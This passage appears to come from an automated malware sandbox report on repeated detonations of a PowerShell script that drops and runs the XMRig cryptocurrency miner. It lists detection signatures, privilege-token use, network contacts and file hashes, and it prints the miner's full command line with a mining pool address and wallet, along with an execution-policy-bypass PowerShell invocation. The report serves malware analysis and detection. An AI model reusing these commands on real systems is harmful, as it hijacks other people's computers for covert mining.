N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 137.71.105.51.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ha24fpsk.aiu.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral21

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:01

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1751s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 164.189.21.2.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 201.64.52.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4a4lgpbm.bd3.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral23

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:03

Platform

win10v2004-20240508-en

Max time kernel

1790s

Max time network

1795s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 91.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 31.73.42.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ur1cono4.3ts.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral26

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:07

Platform

win10-20240404-en

Max time kernel

1791s

Max time network

1760s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 92.16.208.104.in-addr.arpa udp

Files

memory/3620-4-0x00007FF87E8A0000-0x00007FF87EA7B000-memory.dmp

memory/3620-3-0x00007FF87E8A0000-0x00007FF87EA7B000-memory.dmp

memory/3620-6-0x00007FF87E8A0000-0x00007FF87EA7B000-memory.dmp

memory/3620-7-0x000002633B420000-0x000002633B442000-memory.dmp

memory/3620-10-0x000002633B610000-0x000002633B686000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_42jds1w5.3we.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/3620-25-0x00007FF87E8A0000-0x00007FF87EA7B000-memory.dmp

memory/3620-48-0x000002633B5F0000-0x000002633B602000-memory.dmp

memory/3620-61-0x000002633B470000-0x000002633B47A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral4

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 01:38

Platform

win11-20240508-en

Max time kernel

1790s

Max time network

1761s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/4088-0-0x00007FFCB83B3000-0x00007FFCB83B5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_esyjkhjw.g5s.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4088-9-0x00007FFCB83B0000-0x00007FFCB8E72000-memory.dmp

memory/4088-10-0x00000280F0BA0000-0x00000280F0BC2000-memory.dmp

memory/4088-11-0x00007FFCB83B0000-0x00007FFCB8E72000-memory.dmp

memory/4088-12-0x00007FFCB83B0000-0x00007FFCB8E72000-memory.dmp

memory/4088-14-0x00000280F0D80000-0x00000280F0D92000-memory.dmp

memory/4088-15-0x00000280F0D60000-0x00000280F0D6A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral11

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 01:54

Platform

win10v2004-20240426-en

Max time kernel

1799s

Max time network

1795s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 74.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 13.179.89.13.in-addr.arpa udp

Files

memory/2496-0-0x00007FFBFE6C3000-0x00007FFBFE6C5000-memory.dmp

memory/2496-1-0x0000026276760000-0x0000026276782000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ysg55qtr.5tg.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2496-11-0x00007FFBFE6C0000-0x00007FFBFF181000-memory.dmp

memory/2496-12-0x00007FFBFE6C0000-0x00007FFBFF181000-memory.dmp

memory/2496-14-0x00007FFBFE6C0000-0x00007FFBFF181000-memory.dmp

memory/2496-16-0x0000026276A30000-0x0000026276A3A000-memory.dmp

memory/2496-15-0x0000026276A50000-0x0000026276A62000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral15

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 01:59

Platform

win10v2004-20240508-en

Max time kernel

1792s

Max time network

1770s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 71.31.126.40.in-addr.arpa udp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 169.117.168.52.in-addr.arpa udp

Files

memory/1804-0-0x00007FF89DDC3000-0x00007FF89DDC5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_onkzk40j.pl3.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1804-6-0x000001F722C20000-0x000001F722C42000-memory.dmp

memory/1804-11-0x00007FF89DDC0000-0x00007FF89E881000-memory.dmp

memory/1804-12-0x00007FF89DDC0000-0x00007FF89E881000-memory.dmp

memory/1804-14-0x00007FF89DDC0000-0x00007FF89E881000-memory.dmp

memory/1804-15-0x000001F722FB0000-0x000001F722FC2000-memory.dmp

memory/1804-16-0x000001F722FA0000-0x000001F722FAA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
